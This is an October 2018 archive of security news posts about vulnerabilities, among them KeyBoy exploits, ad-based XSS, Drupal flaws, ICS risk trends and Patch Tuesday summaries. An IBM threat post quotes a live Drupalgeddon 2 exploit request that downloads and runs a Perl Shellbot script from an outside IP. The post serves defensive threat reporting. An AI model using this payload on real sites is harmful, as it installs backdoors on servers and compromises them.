Category Archives: Vulnerabilities

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers

A month ago we heard of an attack on the EOSBet gambling app. That time, the hackers exploited a vulnerability

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers on Latest Hacking News.

Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF



Beers with Talos (BWT) Podcast Ep. #39 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Ep. #39 show notes: 

Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.

The timeline:

The topics

01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots

The links

Péter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true

==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).

Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Card Factory Exposed Customers Photos Publicly Due To A Website Flaw

Once again, a website glitch at a retailer has put the security and privacy of customers’ data at first. This

Card Factory Exposed Customers Photos Publicly Due To A Website Flaw on Latest Hacking News.

VoiceOver iOS 12 Bug Creates Lock Screen Bypass Exposing User Photos

It hasn’t been long since we reported on other iOS 12 passcodes bypass methods, however here we are with another one.

VoiceOver iOS 12 Bug Creates Lock Screen Bypass Exposing User Photos on Latest Hacking News.

Flaws in Branch.io Affected Over 685 Million Users

More than 685 million user have been affected by a security flaw in the Branch.io service which was used by

Flaws in Branch.io Affected Over 685 Million Users on Latest Hacking News.

KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware

The KeyBoy attacker group is using publicly available exploit code for two Microsoft security flaws to infect vulnerable machines with malware.

Researchers at AlienVault recently observed a new campaign launched by the KeyBoy attacker group, which has been active since at least 2013. In this latest operation, the group sent a phishing email to India’s ambassador to Ethiopia from an email address at nic.in, India’s National Informatics Centre.

The email arrived with an attachment that executed a script containing the public exploit code for CVE-2017-0199, a Microsoft vulnerability that allows attackers to execute arbitrary code using a crafted document. Other documents contained an exploit generator for CVE-2017-8570, which bypasses Microsoft’s patch for CVE-2017-0199.

Exploiting Known Vulnerabilities to Install TSSL and Titan Malware

Upon launching the exploit code, the script downloaded malware known as TSSL. Citizen Lab observed variants of TSSL that came with the FakeRun loader and the TClient backdoor, which allowed the attacker group to download additional threats and maintain a presence on an infected system.

AlienVault also detected KeyBoy’s ongoing distribution of Titan, Android malware that is capable of collecting an infected user’s data and performing instructions as a superuser, according to researchers at Lookout.

These KeyBoy attacks weren’t the first to involve exploit code for CVE-2017-0199 and CVE-2017-8570. FireEye observed attackers abusing CVE-2017-0199 with malicious Microsoft Office RTF documents in April 2017, and Trend Micro detected campaigns exploiting that same flaw via PowerPoint slideshows several months later. In April 2018, Zscaler identified a campaign that leveraged exploit code for CVE-2017-8570 to distribute LokiBot.

The Key to Stopping KeyBoy Attacks

Organizations can protect themselves against KeyBoy’s campaigns and similar operations by practicing intelligent vulnerability management. This approach requires organizations to create an effective vulnerability assessment process and use it to evaluate flaws based on their level of risk. Instead of patching everything as quickly as possible, organizations can use these vulnerability assessments to determine the order in which bugs should be patched.

Sources: AlienVault, Citizen Lab, Lookout, FireEye, Trend Micro, Zscaler

The post KeyBoy Attacker Group Uses Publicly Available Exploit Code to Deliver Malware appeared first on Security Intelligence.

Podcast Episode 116: Cryptojacking and MikroTik’s Bad-Feeling Feel Good Patch Story

MikroTik is part of a bigger problem: the failure of infrastructure owners to take appropriate action to address serious security holes in products.

The post Podcast Episode 116: Cryptojacking and MikroTik’s Bad-Feeling Feel Good Patch Story appeared first on The Security Ledger.

Related Stories

Online ads: a potential way in for XSS attacks

Online ads: a potential way in for XSS attacks

Pretty much nobody likes to see adverts when they browse the Internet. But the fact is that we’ve come to accept them as a necessary evil. Another thing is interstitial ads, or the banners that jump from one place to another covering up content, and which, without a shadow of a doubt, end up giving a bad user experience.

However, if only this were the only harm that these ads could cause; at times, the banners we see most often day to day can end up becoming a real cybersecurity problem and a lure for cybercrime, especially in the business environment.

A draw for XSS attacks

The researcher Randy Westergren has found one of these security bugs. As he has been able to demonstrate, there is a kind of ad that is particularly vulnerable: those that are activated using the iFrame Buster, which makes a banner expand when the cursor is passed over it.

Westergren affirms that a significant (but unspecified) amount of these ads allow iFrame Buster to trigger an XSS attack that can access the website in question’s cookies, as well as the DOM (Document Object Model – the structure that prioritizes the elements generated by the browser when it loads a website) and several other identification services. If this happens while the employee of a company is browsing the Internet, this malware could obtain information or a way into the company, all of which would put the whole organization’s corporate cybersecurity in serious danger.

A more wide-spread problem that it may seem

When we see this kind of threat, it’s always tempting to think that the attacks only happen on strange, fringe websites, or websites that no one in their right mind would trust. However, nothing could be further from the truth: Randy Westergren asserts that it has even infected ads managed by Double Click, Google’s own ad service.

And the fact is, as the expert puts it, the problem doesn’t necessarily lie in the ads themselves, nor in the browsers. The issue starts with advertising agencies, which often choose to develop their own iFrame Busters. This leads to them being incorrectly developed, giving rise to these points of entry being opened up.

Thus, the danger isn’t confined to just sporadic, marginal websites, but rather it is also found on large sites, many of which can be visited by any employee in a company, even if they are on the website for strictly professional reasons. It is therefore not a case of an employee spending their time browsing websites for their own enjoyment and endangering their company’s cybersecurity; the danger can even get in when someone is working effectively.

So the cybercriminals that make use of these tactics will have it easier than ever, since they won’t even need to keep employees busy with suspicious websites or activities; they’ll be able to reel in these employees when they’re browsing normal websites.

How to avoid these attacks

XSS attacks can cause serious problems for corporate cybersecurity, which means that companies of all kinds must be on the look out to keep cybercrime from knocking at their doors. They can do so in two ways:

1.- Raising awareness. We’ve said it on numerous occasions: most of the time, employees are the weakest link in the chain of cyberattacks, becoming the perfect victims because of their lack of knowledge about the potential risks they’re exposing themselves to. This is why it is so important that companies ensure at least a minimum of awareness about cybersecurity: making sure employees don’t trust suspicious websites, extending banners, sites that request more permissions than expected and so on. In any case, anyone can be a potential victim, which means, if they have even the slightest doubt, employees must refer any suspicion to the cybersecurity team to keep the attack from spreading to the rest of the company in the case of an intrusion.

2.- Cybersecurity solutions. Cybersecurity can never depend on employee awareness alone, so it’s vital that companies have cybersecurity services and solutions such as Panda Adaptive Defense, that not only act in case of an incident, but also work preventively, analyzing the possible risks, and constantly updating security protocols in the face of new threats. In the case of vulnerabilities in third party applications, as would be the case here, it’s also vital to have a specific solution that also automatically manages updates and necessary patches – a solution like Panda Patch Management.

Problems with corporate cybersecurity don’t necessarily have to get in using organized cyberattacks, nor with attachments in emails: they can happen even when browsing normally, so companies must stay vigilant to keep cybercrime from getting into their company.

The post Online ads: a potential way in for XSS attacks appeared first on Panda Security Mediacenter.

Windows 10 October 2018 Update: Release – Halt – Bug Identified – Fix!

Windows 10 October 2018 Update came out as a patch bundle supposedly for facilitating users. However, right after the patch

Windows 10 October 2018 Update: Release – Halt – Bug Identified – Fix! on Latest Hacking News.

Is Your Site Protected Against Drupal Security Flaws?

Drupal is a leading open source content management tool that hosts a significant portion of the most popular websites on the internet. If you have not heard about the Drupal security flaws from earlier this year, then you need to take a closer look at what happened and start taking precautions to protect your own installations.

A Brief History of Drupal Security Flaws

The first vulnerability was detected in March, according to Drupal, and had the more widespread implications, since everyone running Drupal since v6 could be at risk — potentially affecting a million users. The oldest of these versions is no longer officially supported, yet it is still popular and can be found in production use.

Researchers have also found active automated exploit attempts in the wild, including a new attack method known as Drupalgeddon 2, which places crypto-mining software on unpatched Drupal sites. This means threat actors are scanning IP address ranges to look for vulnerable websites.

The original Drupalgeddon, an SQL-injection vulnerability, was found back in 2014, according to Linux Journal. Drupalgeddon 2 is somewhat similar to its predecessor in that the flaw has to do with another code injection technique involving inputs to web forms that aren’t properly checked, Check Point Research reported. As a result, anyone can navigate to a specific URL on a Drupal-powered website and take it over. There is no authentication required, and once you are in, you have complete control over the site.

Patches for Drupalgeddon 2 were issued for two versions: Drupal 8.3.4 and Drupal 7.56. There have been no known attacks.

How to Protect Your Website

Drupal compiled some recommendations for responding to a site breach that are worth reviewing not just for those tips specific to their software, but for the general implications of keeping your site current and secure.

For example, you should make a forensic copy of your site before applying any changes in case a threat actor has already entered your site. You should also decide whether to roll back or rebuild your servers and determine whom you should notify in case of a breach.

It’s important to note that just patching your server won’t be sufficient in the face of an exploit such as Drupalgeddon. An attacker could have already entered your system and taken complete control over your website. Examining user behavior can also help to identify improper access to site controls.

Drupal’s general suggestions are useful for any website, no matter what code it is running. These include:

  • Using multifactor authentication (MFA) to protect your logins. This should be common practice by now, but it bears repeating.
  • Using stronger admin passwords. This should also go without saying, but many users are still not employing secure password management.
  • Regularly auditing all your user accounts and ensuring that unfamiliar accounts or admin roles haven’t been created by a threat actor.
  • Not using an account named “admin” as your administrator’s account. This creates an obvious target.

What Drupal Is Doing to Bolster Security

Drupal has two security projects worth examining. The first is an extension called Paranoia that can block misused Hypertext Preprocessor (PHP) pages and prevent privilege escalation techniques. The second is an older project called Security Review that examines your PHP code for common programming mistakes.

Cybersecurity is an ongoing, iterative process, so conducting code reviews and backing up data should be parts of a continuous audit of your website security. Above all else, security should be a central and ubiquitous pillar of your team’s general operations structure.

The post Is Your Site Protected Against Drupal Security Flaws? appeared first on Security Intelligence.

Sony Patched Three Critical Vulnerabilities In Smart TV Bravia

Smart TVs – despite being convenient and user-friendly they remain vulnerable to security threats. The hackers remain on the verge

Sony Patched Three Critical Vulnerabilities In Smart TV Bravia on Latest Hacking News.

Multiple Vulnerabilities Dicovered In RouterOS That Affected MikroTik Routers

Once again, MikroTik Routers make it into the news. Allegedly, a researcher discovered several vulnerabilities in MikroTik Routers that could

Multiple Vulnerabilities Dicovered In RouterOS That Affected MikroTik Routers on Latest Hacking News.

ICS Tactical Security Trends: Analysis of the Most Frequent Security Risks Observed in the Field

Introduction

FireEye iSIGHT Intelligence compiled extensive data from dozens of ICS security health assessment engagements (ICS Healthcheck) performed by Mandiant, FireEye's consulting team, to identify the most pervasive and highest priority security risks in industrial facilities. The information was acquired from hands-on assessments carried out over the last few years across a broad range of industries, including manufacturing, mining, automotive, energy, chemical, natural gas, and utilities. In this post, we provide details of these risks, and indicate best practices and recommendations to mitigate the identified risks.

Mandiant ICS Healthchecks

Mandiant ICS Healthchecks and penetration testing engagements include on-site assessments of customers' IT and ICS systems. The ICS Healthcheck consists of workshops and technical reviews. It captures the results in a final report that ranks discovered findings and vulnerabilities by risk using Mandiant’s Risk Rating method. During an onsite workshop with site technical experts, Mandiant develops a technical understanding of the subject control system(s), builds a network diagram of the control system, analyzes for potential vulnerabilities and threats, and assists with prioritizing recommended countermeasures to defend the environment.

Mandiant also collects and reviews packet captures of network traffic from the ICS environment to validate the network diagram constructed in the workshop and to identify any unexpected or undesirable deviations from the intended design. This traffic is also analyzed for evidence of compromise or misconfiguration of the ICS network/system. Mandiant inspects the deployed security technology for vulnerabilities and other architectural risks, such as inappropriately configured firewalls, dual-homed control system devices, and unnecessary connectivity to the business network or the Internet.

NOTE: Findings are discussed at a generalized level to preserve the anonymity of our customers. This post presents a high-level overview and is meant to be an informative first stop for customers interested in common cyber security issues. For more information or to request Mandiant services, please visit our website.

Methodology: Mandiant Risk Rating System

This blog post leverages information from Mandiant ICS Healthchecks, which evaluate cyber security risk in organizations from multiple industries. The rating of critical and high security risk is based on the Mandiant Risk Rating System, which is determined by identifying the exploitability and the impact of a given issue, and cross-referencing the results (Figure 1).


Figure 1: Impact/exploitability graphic

One Third of Security Risks in ICS Environments Ranked High or Critical

We reviewed findings from all of our risk assessments and then categorized and ranked the reported risks as critical or high, medium, low, or informational (Figure 2). At least 33 percent of the security issues we found in ICS organizations were rated of high or critical risk. This means they were most likely to allow adversaries to readily gain control of target systems and potentially compromise other systems or networks, cause disruption of services, disclose unauthorized information, or result in other significant negative consequences. We suggest immediate remediation for critical risks, and quick action to remediate high security risks.


Figure 2: Risk assessment distribution

Most Common High and Critical Security Risks in ICS Environments

FireEye iSIGHT Intelligence organized the critical and high security risks identified during Mandiant ICS Healthchecks into nine unique categories (Table 1). The three most common were:

  • Vulnerabilities, Patches, and Updates (32 percent)
  • Identity and Access Management (25 percent)
  • Architecture and Network Segmentation (11 percent)

In most of these cases, basic security best practices would be enough to stop (or at least make it more difficult for) threat actors to target an organization's systems. The implications are vast because specialized malware or actors targeting infrastructure would likely look for these flaws first to exploit throughout the targeted attack lifecycle.


Table 1: Distribution of high and critical security risks in ICS environments

Top Three High and Critical Risks and Recommended Mitigations

Vulnerabilities, Patches, and Updates

Vulnerability, patch, and update management procedures enable organizations to secure off-the-shelf software, hardware, and firmware from known security threats. Known vulnerabilities in ICS environments can be leveraged by threat actors to access the network and move laterally to execute targeted attacks. The following common risks were observed during our engagements:

  • Infrequent procedures for patching and updating control systems:
    • We encountered organizations with no formal vulnerability and patch management programs.
  • Out-of-date firmware, hardware, and operating systems (OS), including:
    • Network devices and systems such as switches, firewalls, and routers.
    • Hardware equipment, including desktop computers, cameras, and programmable logic controllers (PLCs).
    • Unsupported legacy operating systems such as Windows Server 2003, XP, 2000, and NT 4.
  • Unaddressed known vulnerabilities in software applications and equipment where patches are available:
    • We observed outdated firewalls with up to 53 unaddressed vulnerabilities and switches with more than 200 vulnerabilities.
    • System management software that can be exploited using known open source tools.
  • Lack of test environments to analyze patches and updates before implementation.

Mitigations

  • Develop a comprehensive ICS Vulnerability Management Strategy and include procedures to implement patches and updates on key assets. More information is provided by the National Institute for Standards and Technology's (NIST) Guide for ICS Security NIST SP800-82.
  • When patches and updates are no longer provided for key infrastructure, choose one of the two following options:
    • Implement a security perimeter around affected assets, protected by, at minimum, a firewall (industrial protocol inspection/blocking if appropriate) for access control and traffic filtering.
    • Decommission legacy devices that might be exploited to gain access to the network, such as switches.
  • Set up development systems or labs that are representative of the running IT and ICS devices. These systems can often be built from existing spares along with the purchase or loan of additional licenses for human-machine interfaces (HMIs) and configuration software from the system vendor. A development system is an excellent platform to test changes and patches, and on which to perform vulnerability scans without risk to active systems.
Identity and Access Management

The second most common category of security issues identified was related to the flaws in or absence of best practices for handling passwords and credentials. Common weaknesses identified by Mandiant include:

  • Lack of multi-factor authentication for remote access and critical accounts:
    • Users were able to remotely access ICS environments from the corporate network without requiring multi-factor authentication.
  • Lack of a comprehensive and enforced password policy:
    • Weak passwords with insufficient length or complexity used for privileged accounts, ICS user accounts, and service accounts.
    • Passwords were not changed frequently.
    • Passwords were reused for multiple accounts.
  • Prominently displayed passwords:
    • Passwords were written on the chassis of devices.
  • Hard-coded and default credentials in applications and equipment:
    • Mandiant discovered Remote Terminal Units (RTUs) containing default credentials, which are commonly available on the Internet and in the device manuals.
    • A modem contained a backdoor account incorporated by the manufacturer.
  • Commonly used “administrator” accounts.
  • Use of shared credentials.

Mitigations

  • Implement two-factor authentication for all possible users, especially administrative accounts.
  • Avoid keeping written copies of passwords and, if necessary, secure them out of sight with limited access for only authorized users.
  • Enforce password policies that require strong passwords that are regularly modified and cannot be reused. More information is available from SANS.
  • Avoid common, easily guessed user account names such as "operator," "administrator," or "admin." Instead, use uniquely named user accounts for all access.
  • Require administrative users to log in with uniquely named user accounts with strong passwords, tied back to an individual person.
  • Avoid shared accounts when feasible. However, if present, they should be hardened using strong passwords that are stored in an encrypted password manager.
Network Segregation and Segmentation

Of the top three risks identified in this post, weaknesses in network segregation and segmentation are the most important. Lack of segregation from the corporate IT network and within the ICS network allows threat actors opportunities to launch remote attacks against key infrastructure by moving laterally from IT services to ICS environments. Furthermore, it increases the risk of commodity malware spreading to ICS networks where the malware could interact with operational assets. The main risks identified by Mandiant included:

  • Plant systems accessible from the corporate network, either directly or through bridge devices (connected to both networks), such as unused servers, HMIs, historians, or loosely configured shared firewalls. We also found:
    • Unfiltered access to plant servers from corporate networks through, for example, a historian communicating with the distributed control system (DCS).
    • Missing segmentation between ICS and corporate networks.
    • Vulnerabilities in bridge devices (e.g., outdated appliances running vulnerable OS) that can enable lateral movement between networks.
    • Business functions (e.g., data backups and anti-virus updates) running on shared control system networks.
  • Dual-homed systems, both servers and desktop computers.
  • Industrial networks connected directly to the internet.

Mitigations

  • Segment all access to ICS with a network Demilitarized Zone (DMZ), as recommended by both NIST SP 800-82 and IEC (Figure 3):
    • Restrict the number of ports, services, and protocols used to establish communications between the ICS and corporate networks to the least possible to reduce the attack surface.
    • Terminate incoming access for both regular and administrative users first in the DMZ, and then establish another session with connectivity into the ICS network.
    • Place servers (or mirrored servers) that provide ICS data to the corporate network in the DMZ.
    • Use firewalls to filter all network traffic entering or leaving the ICS.
    • Firewall rules should filter both incoming traffic from the corporate network and outgoing traffic from the ICS, and they should only allow the minimum required amount of traffic to pass.
  • Isolate the control networks from the internet. A separate network should be used for internet access through a DMZ, and at no time should a bridged connection be allowed between the two networks.
  • Ensure that independent, regularly patched firewalls are used to separate the corporate network from the DMZ and ICS network, and review firewall rulesets on a regular basis.
  • Identify and redirect any non-control system traffic traversing the industrial network.
  • Eliminate all dual-homed servers and hosts.


Figure 3: Reference architecture for segmentation of enterprise and control system networks

Additional Highlights

Additional common risks were identified from other categories, but with less frequency.

Network Management and Monitoring
  • We identified the lack of Network Security Monitoring, Intrusion Detection, and Intrusion Prevention in organizations, including missing endpoint malware protection, leaving unused ports active, and having limited visibility into ICS networks. We recommend the following best practices:
    • A comprehensive network security monitoring strategy should be defined and implemented at the ICS level as part of an overarching ICS security program. Special attention should be placed on monitoring network segments where external connectivity occurs:
  • Implement or increase centralized system and network logging to provide visibility across the entire enterprise (IT and ICS). Monitor logs for anomalous behavior. Consider implementing additional host or network-based security controls that generate alerts or reject traffic based on anomalous or suspicious behavior.
  • Install a centrally managed anti-malware solution on all ICS and ICS DMZ hosts. Ensure that signature and application updates are deployed in a timely manner.
  • Explore alternatives for the deployment of an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Develop procedures to identify and shut down network ports when not in use.
Misconfigurations in Firewall Rules

We identified weak firewall rules including "ANY-ANY" configurations, conflicting or overlapping rules, overly permissive conditions allowing access to administrative services, and lack of console connection timeouts. We recommend the following best practices for secure firewall configuration:

  • Filtering rules should only allow access from/to specific source/destination IP addresses and ports.
  • Filter rules should specify a specific network protocol.
  • ICMP filter rules should specify a specific message type.
  • Filter rules should drop network packets instead of rejecting them.
  • Filter rules should perform a specific action and not rely on a default action.
  • Administrative session timeout parameters should be set to terminate those sessions after a predetermined amount of time.
Cyber Security Governance Best Practices

We identified some organizations with limited or absent formal and comprehensive ICS security programs. We highly suggest organizations implement ICS security programs to prioritize the following recommendations:

  • Establish a formal ICS security program with a clearly defined owner, accountability, and governance structure. It should include:
    • Business expectations, policies, and technical standards for ICS security.
    • Guidance on proactive security controls (e.g., implementation of patches and updates, change management, or secure configurations).
    • Incident Response, Disaster Recovery, and Business Continuity plans.
    • ICS security awareness training plans.
  • Develop a Vulnerability Management Strategy following NIST SP800-82, including asset identification and inventory, risk assessment and analysis methodology (with prioritization of critical assets), remediation testing, and deployment guidelines.

Conclusion

This blog post presents a broad picture of the current risks facing industrial organizations as observed during Mandiant ICS Healthchecks. While the trends observed in this research align with risk areas commonly discussed in security conference talks and media reports, this blog draws from dozens of on-site assessments that hold real-life validity.

Our findings indicate that at least one third of the critical and high security risks in ICS are related to vulnerabilities, patches, and updates. Known vulnerabilities continue to represent significant challenges for ICS owners that must oversee the daily operation of thousands of assets in complex industrial environments. It is also relevant to highlight that some of the most common risks we identified could be mitigated with security best practices, such as enforcing a comprehensive password management policy or establishing detailed firewall rules. If you are interested in more information or to request Mandiant services, please visit our website.

Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers

IBM Security’s Managed Security Services (MSS) team monitors the enterprise threat landscape on an ongoing basis, detecting and mapping new threats as they emerge. In a recent investigation, our MSS intelligence analysts discovered that malicious actors are using recent Drupal vulnerabilities to target various websites and possibly the underlying infrastructure that hosts them, leveraging Shellbot to open backdoors.

This appears to be a financially motivated effort to mass-compromise websites. How can defenders keep websites and underlying systems safe in the face of these evolving threats?

What Is Drupal, and Why Is It a Target?

Like WordPress, Drupal is a content management system (CMS) that is used widely by people who create and maintain websites and applications for all sorts of purposes, both personal and business, private and public. Drupal is open source and, as such, is maintained by a community of users. This is also how its security and vulnerability patching is maintained.

CMSs that are used across a large number of websites are juicy targets for cybercriminals, who commonly automate their attacks in a one-size-fits-all type of operation. Those who target random websites aim to compromise as many as possible and consider the monetization options later.

To do that, malicious actors often pick a vulnerability and then probe for exploitable sites en masse. Those found unpatched or vulnerable for some other reason might fall under the attacker’s control, which could mean a complete compromise of that site. With this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.

ShellBot Attacks Open Backdoors With Drupalgeddon 2.0

In recent investigations into malicious activity targeting enterprises across the globe, our team detected an IP address that was repeatedly sending the same HTTP POST request:

IP Address

Suspicious Request

31.204.80.133

/?q=user/password&name[#type]=markup&name[#markup]=cd /tmp;wget 64.15.78.216 /lip;perl;cd /tmp;curl -O 64.15.78.216 /lip;perl lip;rm -rf lip*&name[#post_render][]=passthru

Further examination of these requests revealed additional sources of similar traffic from a number of command-and-control (C&C) servers, hosting servers that download a Perl script to launch the Shellbot malware and a payload naming pattern that started to paint the picture of a widespread cyberattack. Our team traced the beginning of this campaign to mid-August 2018.

Scan and Deploy

Scanning websites for vulnerable configurations, the attackers leveraged a critical remote code execution (RCE) vulnerability known as CVE-2018-7600, or Drupalgeddon 2.0, to eventually open a backdoor using the Shellbot malware. The scan also included a second vulnerability, CVE-2018-7602, another highly critical RCE flaw. Both these flaws have been patched, but vulnerabilities persists as users delay in patching and upgrading.

As we continued to look into the attack, vulnerable websites were scanned for the /user/register and /user/password pages in the installation phase as attackers tried to brute-force their way in with existing user access details discovered while attempting to “wget” the Perl script for Backdoor.Shellbot.

When successful, the script ran a shell command injection that was used to install the Perl-based bot. The Shellbot instance in our investigation connected to an Internet Relay Chat (IRC) channel and used it as a C&C hub to receive instructions from its controller. The bot contained multiple tools to perform distributed denial-of-service (DDoS) attacks and search for SQL injection weaknesses and other vulnerabilities, including privilege escalation to reach root level on the victimized system.

The vulnerabilities used in this campaign were leveraged in an automated way, allowing attackers to scan a large number of websites with minimal effort. Moreover, if successfully exploited, the flaw could lead to a potential compromise of the web application with the possibility of spilling over to the underlying operating system as well.

Shellbot Resurfaces

Shellbot itself is an old code that has been around since about 2005, used maliciously to remotely access and control compromised endpoints. Shellbot can open remote command line shells, perform denial-of-service attacks, run tasks and processes, download additional files per the attacker’s command, and change the endpoint’s settings, to name a few.

Shellbot may seem dated and simplistic, but it is in active use by several threat groups. In March 2017, in the heat of Apache Struts (CVE-2017-5638), ShellBot was packaged as the C&C with the PowerBot malware, which deployed cryptocurrency mining modules on infected devices. This combination allowed criminals to generate over $100k in illicit profits from their schemes.

Reviewing most of the Shellbot malware attacks we have detected in recent months, our team identified some variants with instructions to:

  • Terminate all running cryptocurrency mining activities before installing the attacker’s new cryptocurrency miner;
  • Host phishing campaigns;
  • Distribute phishing email spam;
  • Carry out various types of DDoS attacks; and
  • Exfiltrate data via a PHP module to a predetermined email address.

Attackers Bank on Old Vulnerabilities

It costs a lot of time and money to find or buy a zero-day flaw — two resources cybercriminals are typically not willing to invest. It is much more lucrative to use existing vulnerabilities such as Drupalgeddon and attack code in an automated way, especially when users delay patching and updating their applications.

Here are some tips from our security specialists on how to mitigate the risk from existing vulnerabilities and those who use them to compromise web resources and assets:

  • Use updated protocols such as HTTPS and upgrade if need be.
  • Update CMSs to the most recent version and use all available patches.
  • Perform input validation checks on all web applications to ensure that shell commands cannot be executed by any end user. Validate on both client and server side to ensure that scripting and malicious code cannot run on the underlying server or database.
  • Attackers will try to brute-force credentials; make sure that passwords are strong, encrypted and salted. Use two-factor authentication (2FA) to foil automated attacks.

Want to know more? Find indicators of compromise (IoCs) and more technical details about this campaign on X-Force Exchange.

The post Threat Actors Prey on Drupalgeddon Vulnerability to Mass-Compromise Websites and Underlying Servers appeared first on Security Intelligence.

Goodbye Google Plus – Google Plans Google+ Shut Down After Data Breach

For all Google+ users, here coms some bad news. Google has announced to sunset Google Plus as a consequence of

Goodbye Google Plus – Google Plans Google+ Shut Down After Data Breach on Latest Hacking News.

Security Vulnerabilities in US Weapons Systems

The US Government Accounting Office just published a new report: "Weapons Systems Cyber Security: DOD Just Beginning to Grapple with Scale of Vulnerabilities" (summary here). The upshot won't be a surprise to any of my regular readers: they're vulnerable.

From the summary:

Automation and connectivity are fundamental enablers of DOD's modern military capabilities. However, they make weapon systems more vulnerable to cyber attacks. Although GAO and others have warned of cyber risks for decades, until recently, DOD did not prioritize weapon systems cybersecurity. Finally, DOD is still determining how best to address weapon systems cybersecurity.

In operational testing, DOD routinely found mission-critical cyber vulnerabilities in systems that were under development, yet program officials GAO met with believed their systems were secure and discounted some test results as unrealistic. Using relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected, due in part to basic issues such as poor password management and unencrypted communications. In addition, vulnerabilities that DOD is aware of likely represent a fraction of total vulnerabilities due to testing limitations. For example, not all programs have been tested and tests do not reflect the full range of threats.

It is definitely easier, and cheaper, to ignore the problem or pretend it isn't a big deal. But that's probably a mistake in the long run.

TrendLabs Security Intelligence Blog: October Patch Tuesday: Microsoft Repairs JET Database Engine Bug, Win32K EoP Zero-Day

This month’s Patch Tuesday fixes a JET Database Engine Vulnerability (CVE-2018-8423) that Trend Micro’s Zero Day Initiative (ZDI) disclosed last September together with a proof of concept code. The vulnerability, which was rated as Important, can allow an attacker to send a specially crafted file containing data in the JET database format. When accessed on a machine, it can allow the JET database engine to execute an out-of-bounds write that would then allow for remote code execution. This month, Microsoft released 49 patches and two advisories, with 12 listed as Critical, 35 as Important, one Moderate, and one Low. Of the 49 CVEs, eight were disclosed through the ZDI program.

The patch release also fixed a vulnerability that’s currently under active attack: CVE-2018-8453, which is a Win32K elevation of privilege zero-day discovered by security researchers from Kaspersky Labs. To exploit this bug, an attacker must first successfully log into the system. However, once a system is infiltrated, an attacker can install programs as well as view, modify, or even delete data. It can also allow attackers to create new accounts with full user rights on an infiltrated system. This month’s patch corrects how Win32K handles objects in memory.

Meanwhile, on the Adobe front, a massive 86 CVEs were patched in total. On October 1, early patches were released for both Acrobat and Reader, while additional patches for Flash, Framemaker, Adobe Digital Editions, and the Adobe Technical Communications Suite were released on Patch Tuesday. 47 of the bugs are listed as Critical, and a total of 14 were handled by the ZDI.

Trend Micro™ Deep Security and Vulnerability Protection protect user systems from any threats that may target the vulnerabilities addressed in this month’s round of updates via the following DPI rules:

  • 1004373 – Identified DLL Side Loading Attempt Over Network Share (CVE-2010-3190)
  • 1009330 – Microsoft MFC Insecure Library Loading Vulnerability Over Network Share (CVE-2010-3190)
  • 1009331 – Microsoft Filter Manager Elevation Of Privilege Vulnerability (CVE-2018-8333)
  • 1009333 – Microsoft Windows Theme API Remote Code Execution Vulnerability (CVE-2018-8413)
  • 1009335 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8460)
  • 1009336 – Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2018-8491)
  • 1009337 – Microsoft Windows Device Guard Code Integrity Policy Security Feature Bypass Vulnerability (CVE-2018-8492)
  • 1009338 – Microsoft Windows Shell Remote Code Execution Vulnerability (CVE-2018-8495)
  • 1009339 – Microsoft Edge Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8505)
  • 1009340 – Microsoft Windows Multiple Security Vulnerabilities (Oct-2018)
  • 1009341 – Microsoft MFC Insecure Library Loading Vulnerability Over WebDAV (CVE-2010-3190)

Trend Micro™ TippingPoint™ customers are protected from threats that may exploit this month’s list of vulnerabilities via these MainlineDV filters:

  • 32732: HTTP: Microsoft Internet Explorer msCrypto Use-After-Free Vulnerability
  • 33120: SMB: Microsoft Windows Out-of-Bounds Write Vulnerability
  • 33124: HTTP: Microsoft Windows DirectX Information Disclosure Vulnerability
  • 33132: HTTP: Microsoft Edge Windows Shell Memory Corruption Vulnerability
  • 33134: HTTP: Microsoft Edge Chakra JIT Type Confusion Vulnerability
  • 33147: HTTP: Microsoft PowerShell XML/XSL COM Instantiation and Transformation Usage

 

The post October Patch Tuesday: Microsoft Repairs JET Database Engine Bug, Win32K EoP Zero-Day appeared first on .



TrendLabs Security Intelligence Blog

Microsoft Patch Tuesday — October 18: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 49 vulnerabilities, 12 of which are rated "critical," 34 that are rated "important,” two that are considered to have “moderate” severity and one that’s rated as “low.”

The advisories cover bugs in the Chakra scripting engine, the Microsoft Edge internet browser and the Microsoft Office suite of products, among other software.

This update also includes a critical advisory that covers updates to the Microsoft Office suite of products.

Critical vulnerabilities

Microsoft has disclosed 12 critical vulnerabilities this month, which we will highlight below.


